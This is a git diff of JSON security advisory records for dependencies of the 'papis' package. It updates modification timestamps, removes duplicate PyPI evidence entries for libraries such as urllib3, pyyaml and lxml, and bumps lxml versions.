b/advisories/BREW-papis-CVE-2019-11324.json index 9b84c3e974..a695e467b1 100644 --- a/advisories/BREW-papis-CVE-2019-11324.json +++ b/advisories/BREW-papis-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2019-11324", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2019-20477.json b/advisories/BREW-papis-CVE-2019-20477.json index c69c48e4ca..8e4690d679 100644 --- a/advisories/BREW-papis-CVE-2019-20477.json +++ b/advisories/BREW-papis-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2019-20477", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2020-14343.json b/advisories/BREW-papis-CVE-2020-14343.json index bfe06f8953..6dfd0d214e 100644 --- a/advisories/BREW-papis-CVE-2020-14343.json +++ b/advisories/BREW-papis-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2020-14343", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2020-1747.json b/advisories/BREW-papis-CVE-2020-1747.json index b83a9b3980..fcd282fcfc 100644 --- a/advisories/BREW-papis-CVE-2020-1747.json +++ b/advisories/BREW-papis-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2020-1747", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2020-26137.json b/advisories/BREW-papis-CVE-2020-26137.json index 21e6dda5c4..c73e08dae8 100644 --- a/advisories/BREW-papis-CVE-2020-26137.json +++ b/advisories/BREW-papis-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2020-26137", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2020-27783.json b/advisories/BREW-papis-CVE-2020-27783.json index 5c543ed294..9458b1d652 100644 --- a/advisories/BREW-papis-CVE-2020-27783.json +++ b/advisories/BREW-papis-CVE-2020-27783.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2020-27783", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-pgww-xf46-h92r", "CVE-2020-27783", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.6.2", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.3", + "key": "pkg:pypi/lxml@6.1.3", "resource": "lxml" } ] diff --git a/advisories/BREW-papis-CVE-2020-7212.json b/advisories/BREW-papis-CVE-2020-7212.json index 0ac47360e8..7290a4f64c 100644 --- a/advisories/BREW-papis-CVE-2020-7212.json +++ b/advisories/BREW-papis-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2020-7212", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2021-20270.json b/advisories/BREW-papis-CVE-2021-20270.json index a619123f24..71255b2b08 100644 --- a/advisories/BREW-papis-CVE-2021-20270.json +++ b/advisories/BREW-papis-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2021-20270", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2021-27291.json b/advisories/BREW-papis-CVE-2021-27291.json index 7e7c05c5f4..aa79bef234 100644 --- a/advisories/BREW-papis-CVE-2021-27291.json +++ b/advisories/BREW-papis-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2021-27291", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2021-28363.json b/advisories/BREW-papis-CVE-2021-28363.json index 0a9e88fdb2..f44a3ddd03 100644 --- a/advisories/BREW-papis-CVE-2021-28363.json +++ b/advisories/BREW-papis-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2021-28363", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2021-28957.json b/advisories/BREW-papis-CVE-2021-28957.json index 5ab5fa2dfd..390d451ace 100644 --- a/advisories/BREW-papis-CVE-2021-28957.json +++ b/advisories/BREW-papis-CVE-2021-28957.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2021-28957", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-jq4v-f5q6-mjqq", "CVE-2021-28957", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.6.3", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.3", + "key": "pkg:pypi/lxml@6.1.3", "resource": "lxml" } ] diff --git a/advisories/BREW-papis-CVE-2021-33503.json b/advisories/BREW-papis-CVE-2021-33503.json index 790f6051f4..9dbe1058bf 100644 --- a/advisories/BREW-papis-CVE-2021-33503.json +++ b/advisories/BREW-papis-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2021-33503", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2021-43818.json b/advisories/BREW-papis-CVE-2021-43818.json index 7c3267df0a..fc73da4d77 100644 --- a/advisories/BREW-papis-CVE-2021-43818.json +++ b/advisories/BREW-papis-CVE-2021-43818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2021-43818", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-55x5-fj6c-h6m8", "CVE-2021-43818", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.6.5", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.3", + "key": "pkg:pypi/lxml@6.1.3", "resource": "lxml" } ] diff --git a/advisories/BREW-papis-CVE-2022-2309.json b/advisories/BREW-papis-CVE-2022-2309.json index 59fce31135..b3c2dc2747 100644 --- a/advisories/BREW-papis-CVE-2022-2309.json +++ b/advisories/BREW-papis-CVE-2022-2309.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2022-2309", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-wrxv-2j5q-m38w", "CVE-2022-2309", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.9.1", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.3", + "key": "pkg:pypi/lxml@6.1.3", "resource": "lxml" } ] diff --git a/advisories/BREW-papis-CVE-2022-40896.json b/advisories/BREW-papis-CVE-2022-40896.json index cd3e6d82b4..4b63fcb12c 100644 --- a/advisories/BREW-papis-CVE-2022-40896.json +++ b/advisories/BREW-papis-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2022-40896", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2023-32681.json b/advisories/BREW-papis-CVE-2023-32681.json index ce96427ac8..d4ed81c479 100644 --- a/advisories/BREW-papis-CVE-2023-32681.json +++ b/advisories/BREW-papis-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2023-32681", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2023-43804.json b/advisories/BREW-papis-CVE-2023-43804.json index 26aa32cb1c..a424ffaa0e 100644 --- a/advisories/BREW-papis-CVE-2023-43804.json +++ b/advisories/BREW-papis-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2023-43804", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2023-45803.json b/advisories/BREW-papis-CVE-2023-45803.json index 4279c4f30b..33c93b7bcf 100644 --- a/advisories/BREW-papis-CVE-2023-45803.json +++ b/advisories/BREW-papis-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2023-45803", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2024-34062.json b/advisories/BREW-papis-CVE-2024-34062.json index 3ff46b8dcf..923ec1dad5 100644 --- a/advisories/BREW-papis-CVE-2024-34062.json +++ b/advisories/BREW-papis-CVE-2024-34062.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2024-34062", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-g7vv-2v7x-gj9p", "CVE-2024-34062", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tqdm", - "subject_version": "4.70.0", - "key": "pkg:pypi/tqdm@4.70.0", - "resource": "tqdm" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2024-35195.json b/advisories/BREW-papis-CVE-2024-35195.json index 3eb9ebd275..dc5cf04c13 100644 --- a/advisories/BREW-papis-CVE-2024-35195.json +++ b/advisories/BREW-papis-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2024-35195", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2024-3651.json b/advisories/BREW-papis-CVE-2024-3651.json index ab5114b228..91845aa845 100644 --- a/advisories/BREW-papis-CVE-2024-3651.json +++ b/advisories/BREW-papis-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2024-3651", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2024-37891.json b/advisories/BREW-papis-CVE-2024-37891.json index 6dbd47100e..c3b1db2cab 100644 --- a/advisories/BREW-papis-CVE-2024-37891.json +++ b/advisories/BREW-papis-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2024-37891", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2024-47081.json b/advisories/BREW-papis-CVE-2024-47081.json index 1a105fa4ad..c997ba5d6c 100644 --- a/advisories/BREW-papis-CVE-2024-47081.json +++ b/advisories/BREW-papis-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2024-47081", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2025-43859.json b/advisories/BREW-papis-CVE-2025-43859.json index d39123ffef..6029fbc5a6 100644 --- a/advisories/BREW-papis-CVE-2025-43859.json +++ b/advisories/BREW-papis-CVE-2025-43859.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2025-43859", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:19:42Z", "upstream": [ "GHSA-vqfr-h8mv-ghfj", "CVE-2025-43859", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "h11", - "subject_version": "0.16.0", - "key": "pkg:pypi/h11@0.16.0", - "resource": "h11" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2025-50181.json b/advisories/BREW-papis-CVE-2025-50181.json index f6f38ccc2e..077c15d96b 100644 --- a/advisories/BREW-papis-CVE-2025-50181.json +++ b/advisories/BREW-papis-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2025-50181", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2025-50182.json b/advisories/BREW-papis-CVE-2025-50182.json index fec488aff4..bcb1966d49 100644 --- a/advisories/BREW-papis-CVE-2025-50182.json +++ b/advisories/BREW-papis-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2025-50182", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2025-66418.json b/advisories/BREW-papis-CVE-2025-66418.json index 9f2078d86e..473892558e 100644 --- a/advisories/BREW-papis-CVE-2025-66418.json +++ b/advisories/BREW-papis-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2025-66418", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2025-66471.json b/advisories/BREW-papis-CVE-2025-66471.json index 39bd33535e..b5b7b5cedf 100644 --- a/advisories/BREW-papis-CVE-2025-66471.json +++ b/advisories/BREW-papis-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2025-66471", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2026-21441.json b/advisories/BREW-papis-CVE-2026-21441.json index c06ef4a2a4..9e54d888f7 100644 --- a/advisories/BREW-papis-CVE-2026-21441.json +++ b/advisories/BREW-papis-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2026-21441", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2026-25645.json b/advisories/BREW-papis-CVE-2026-25645.json index 8d453630fa..b8ba21f613 100644 --- a/advisories/BREW-papis-CVE-2026-25645.json +++ b/advisories/BREW-papis-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2026-25645", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2026-41066.json b/advisories/BREW-papis-CVE-2026-41066.json index c9aa1e81e9..9fd3b0fa5e 100644 --- a/advisories/BREW-papis-CVE-2026-41066.json +++ b/advisories/BREW-papis-CVE-2026-41066.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2026-41066", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-vfmq-68hx-4jfw", "CVE-2026-41066", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "6.1.0", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.3", + "key": "pkg:pypi/lxml@6.1.3", "resource": "lxml" } ] diff --git a/advisories/BREW-papis-CVE-2026-44431.json b/advisories/BREW-papis-CVE-2026-44431.json index ea8479b67f..c300894744 100644 --- a/advisories/BREW-papis-CVE-2026-44431.json +++ b/advisories/BREW-papis-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2026-44431", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2026-44432.json b/advisories/BREW-papis-CVE-2026-44432.json index e7132c6d4c..d5c53649bb 100644 --- a/advisories/BREW-papis-CVE-2026-44432.json +++ b/advisories/BREW-papis-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2026-44432", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git 